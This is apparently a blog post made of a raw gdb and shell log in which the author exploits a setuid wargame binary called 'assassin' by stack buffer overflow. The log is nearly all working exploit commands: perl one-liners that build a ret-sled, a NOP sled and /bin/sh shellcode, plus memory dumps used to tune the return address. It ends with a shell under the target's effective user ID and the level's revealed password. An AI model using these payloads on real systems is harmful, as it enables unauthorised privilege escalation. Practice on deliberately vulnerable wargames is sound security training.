Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

I don't remember exactly, but I think I probably solved this one with ret sledding...

Program received signal SIGSEGV, Segmentation fault.
0x0 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`


Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`


Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`


Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) x/100x 0xbffffd00
0xbffffd00:     0x69616d6f      0x4f4c006e      0x4d414e47      0x69673d45
0xbffffd10:     0x00746e61      0x4f4d4552      0x4f484554      0x313d5453
0xbffffd20:     0x312e3239      0x322e3836      0x312e3232      0x49414d00
0xbffffd30:     0x762f3d4c      0x732f7261      0x6c6f6f70      0x69616d2f
0xbffffd40:     0x69672f6c      0x00746e61      0x4d524554      0x6574783d
0xbffffd50:     0x48006d72      0x5454534f      0x3d455059      0x36383369
0xbffffd60:     0x54415000      0x752f3d48      0x6c2f7273      0x6c61636f
0xbffffd70:     0x6e69622f      0x69622f3a      0x752f3a6e      0x622f7273
0xbffffd80:     0x2f3a6e69      0x2f727375      0x52313158      0x69622f36
0xbffffd90:     0x682f3a6e      0x2f656d6f      0x6e616967      0x69622f74
0xbffffda0:     0x4f48006e      0x2f3d454d      0x656d6f68      0x6169672f
0xbffffdb0:     0x4900746e      0x5455504e      0x2f3d4352      0x2f637465
0xbffffdc0:     0x75706e69      0x00637274      0x4c454853      0x622f3d4c
0xbffffdd0:     0x622f6e69      0x00687361      0x52455355      0x6169673d
0xbffffde0:     0x4200746e      0x5f485341      0x3d564e45      0x6d6f682f
0xbffffdf0:     0x69672f65      0x2f746e61      0x7361622e      0x00637268
0xbffffe00:     0x474e414c      0x5f6e653d      0x4f005355      0x50595453
0xbffffe10:     0x694c3d45      0x0078756e      0x564c4853      0x00313d4c
0xbffffe20:     0x435f534c      0x524f4c4f      0x6f6e3d53      0x3a30303d
0xbffffe30:     0x303d6966      0x69643a30      0x3b31303d      0x6c3a3433
0xbffffe40:     0x31303d6e      0x3a36333b      0x343d6970      0x33333b30
0xbffffe50:     0x3d6f733a      0x333b3130      0x64623a35      0x3b30343d
0xbffffe60:     0x303b3333      0x64633a31      0x3b30343d      0x303b3333
0xbffffe70:     0x726f3a31      0x3b31303d      0x333b3530      0x31343b37
0xbffffe80:     0x3d696d3a      0x303b3130      0x37333b35      0x3a31343b
(gdb) x/100x 0xbffffd00-100
0xbffffc9c:     0x8969622f      0xb0c189e3      0x5351520b      0x80cde189
0xbffffcac:     0x53454c00      0x45504f53      0x2f7c3d4e      0x2f727375
0xbffffcbc:     0x2f6e6962      0x7373656c      0x65706970      0x2068732e
0xbffffccc:     0x55007325      0x4e524553      0x3d454d41      0x53494800
0xbffffcdc:     0x5a495354      0x30313d45      0x48003030      0x4e54534f
0xbffffcec:     0x3d454d41      0x61636f6c      0x736f686c      0x6f6c2e74
0xbffffcfc:     0x646c6163      0x69616d6f      0x4f4c006e      0x4d414e47
0xbffffd0c:     0x69673d45      0x00746e61      0x4f4d4552      0x4f484554
0xbffffd1c:     0x313d5453      0x312e3239      0x322e3836      0x312e3232
0xbffffd2c:     0x49414d00      0x762f3d4c      0x732f7261      0x6c6f6f70
0xbffffd3c:     0x69616d2f      0x69672f6c      0x00746e61      0x4d524554
0xbffffd4c:     0x6574783d      0x48006d72      0x5454534f      0x3d455059
0xbffffd5c:     0x36383369      0x54415000      0x752f3d48      0x6c2f7273
0xbffffd6c:     0x6c61636f      0x6e69622f      0x69622f3a      0x752f3a6e
0xbffffd7c:     0x622f7273      0x2f3a6e69      0x2f727375      0x52313158
0xbffffd8c:     0x69622f36      0x682f3a6e      0x2f656d6f      0x6e616967
0xbffffd9c:     0x69622f74      0x4f48006e      0x2f3d454d      0x656d6f68
0xbffffdac:     0x6169672f      0x4900746e      0x5455504e      0x2f3d4352
0xbffffdbc:     0x2f637465      0x75706e69      0x00637274      0x4c454853
0xbffffdcc:     0x622f3d4c      0x622f6e69      0x00687361      0x52455355
0xbffffddc:     0x6169673d      0x4200746e      0x5f485341      0x3d564e45
0xbffffdec:     0x6d6f682f      0x69672f65      0x2f746e61      0x7361622e
0xbffffdfc:     0x00637268      0x474e414c      0x5f6e653d      0x4f005355
0xbffffe0c:     0x50595453      0x694c3d45      0x0078756e      0x564c4853
0xbffffe1c:     0x00313d4c      0x435f534c      0x524f4c4f      0x6f6e3d53
(gdb) x/100x 0xbffffd00-300
0xbffffbd4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbe4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbf4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc04:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc14:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc24:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc34:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc44:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc54:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc64:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc74:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc84:     0x90909090      0x90909090      0x90909090      0xc289c031
0xbffffc94:     0x2f6e6850      0x2f686873      0x8969622f      0xb0c189e3
0xbffffca4:     0x5351520b      0x80cde189      0x53454c00      0x45504f53
0xbffffcb4:     0x2f7c3d4e      0x2f727375      0x2f6e6962      0x7373656c
0xbffffcc4:     0x65706970      0x2068732e      0x55007325      0x4e524553
0xbffffcd4:     0x3d454d41      0x53494800      0x5a495354      0x30313d45
0xbffffce4:     0x48003030      0x4e54534f      0x3d454d41      0x61636f6c
0xbffffcf4:     0x736f686c      0x6f6c2e74      0x646c6163      0x69616d6f
0xbffffd04:     0x4f4c006e      0x4d414e47      0x69673d45      0x00746e61
0xbffffd14:     0x4f4d4552      0x4f484554      0x313d5453      0x312e3239
0xbffffd24:     0x322e3836      0x312e3232      0x49414d00      0x762f3d4c
0xbffffd34:     0x732f7261      0x6c6f6f70      0x69616d2f      0x69672f6c
0xbffffd44:     0x00746e61      0x4d524554      0x6574783d      0x48006d72
0xbffffd54:     0x5454534f      0x3d455059      0x36383369      0x54415000
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) q
The program is running.  Exit anyway? (y or n) y
[giant@localhost tmp]$
[giant@localhost tmp]$ r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
bash: r: command not found
[giant@localhost tmp]$ bash2
[giant@localhost tmp]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`

bash$ id
uid=514(giant) gid=514(giant) groups=514(giant)
bash$ q
sh: q: command not found
bash$ exit
exit
[giant@localhost tmp]$ cd ../
[giant@localhost giant]$ ls
assassin  assassin.c  tmp
[giant@localhost giant]$ finger
Login     Name       Tty      Idle  Login Time   Office     Office Phone
giant                pts/0          Jul 30 18:48 (192.168.222.1)
[giant@localhost giant]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`

bash$ id
uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)
bash$ my-pass
euid = 515
pushing me away
bash$


Posted by windowhan